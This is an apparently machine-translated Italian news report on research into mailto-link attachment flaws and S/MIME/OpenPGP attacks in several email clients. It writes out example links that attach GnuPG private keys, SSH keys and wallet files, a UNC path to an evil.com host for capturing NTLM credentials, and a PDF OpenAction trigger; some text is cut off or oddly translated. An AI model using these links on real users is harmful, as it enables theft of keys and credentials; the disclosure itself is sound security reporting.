Ricercatori dell’Università della Ruhr di Bochum (Germania)
Collegamenti «
I client di posta Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) e Pegasus Mail erano vulnerabili a un banale attacco che consente di allegare automaticamente qualsiasi file locale, specificato tramite un collegamento come "mailto:?attach=path_to_file". Il file viene allegato senza visualizzare un avviso, quindi senza particolare attenzione l'utente potrebbe non accorgersi che la lettera verrà inviata con un allegato.
Ad esempio, utilizzando un collegamento come "mailto:[email protected]&subject=Title&body=Text&attach=~/.gnupg/secring.gpg" puoi inserire le chiavi private di GnuPG nella lettera. Puoi anche inviare il contenuto dei portafogli crittografici (~/.bitcoin/wallet.dat), le chiavi SSH (~/.ssh/id_rsa) e qualsiasi file accessibile all'utente. Inoltre, Thunderbird ti consente di allegare gruppi di file tramite maschera utilizzando costrutti come “attach=/tmp/*.txt”.
Oltre ai file locali, alcuni client di posta elettronica elaborano i collegamenti allo spazio di archiviazione di rete e ai percorsi nel server IMAP. In particolare, IBM Notes consente di trasferire un file da una directory di rete durante l'elaborazione di collegamenti come "attach=\\evil.com\dummyfile", nonché di intercettare i parametri di autenticazione NTLM inviando un collegamento a un server SMB controllato dall'aggressore (la richiesta verrà inviata con i parametri di autenticazione correnti dell'utente).
Thunderbird elabora con successo richieste come "attach=imap:///fetch>UID>/INBOX>1/", che consentono di allegare contenuti dalle cartelle sul server IMAP. Allo stesso tempo, i messaggi recuperati da IMAP, crittografati tramite OpenPGP e S/MIME, vengono automaticamente decrittografati dal client di posta prima dell'invio. Gli sviluppatori di Thunderbird erano
Le vecchie versioni di Thunderbird erano vulnerabili anche ad altre due varianti di attacco PGP e S/MIME proposte dai ricercatori. In particolare, Thunderbird, così come OutLook, PostBox, eM Client, MailMate e R2Mail2, è stato oggetto di un attacco di sostituzione della chiave, causato dal fatto che il client di posta importa e installa automaticamente nuovi certificati trasmessi nei messaggi S/MIME, che consente all'attaccante di organizzare la sostituzione delle chiavi pubbliche già memorizzate dall'utente.
Il secondo attacco, a cui sono vulnerabili Thunderbird, PostBox e MailMate, manipola le caratteristiche del meccanismo di salvataggio automatico delle bozze dei messaggi e consente, utilizzando parametri mailto, di avviare la decrittazione di messaggi crittografati o l'aggiunta di una firma digitale per messaggi arbitrari, con successiva trasmissione del risultato al server IMAP dell'aggressore. In questo attacco, il testo cifrato viene trasmesso attraverso il parametro “body” e il tag “meta refresh” viene utilizzato per avviare una chiamata al server IMAP dell’aggressore. Per esempio: ' '
Per elaborare automaticamente i collegamenti "mailto:" senza l'interazione dell'utente, è possibile utilizzare documenti PDF appositamente progettati: l'azione OpenAction in PDF consente di avviare automaticamente il gestore mailto all'apertura di un documento:
% PDF-1.5
1 0 ogg
<< /Tipo /Catalogo /OpenAction [2 0 R] >>
endob
2 0 ogg
<< /Type /Action /S /URI/URI (mailto:?body=——BEGIN PGP MESSAGE——[…])>>
endob
Fonte: opennet.ru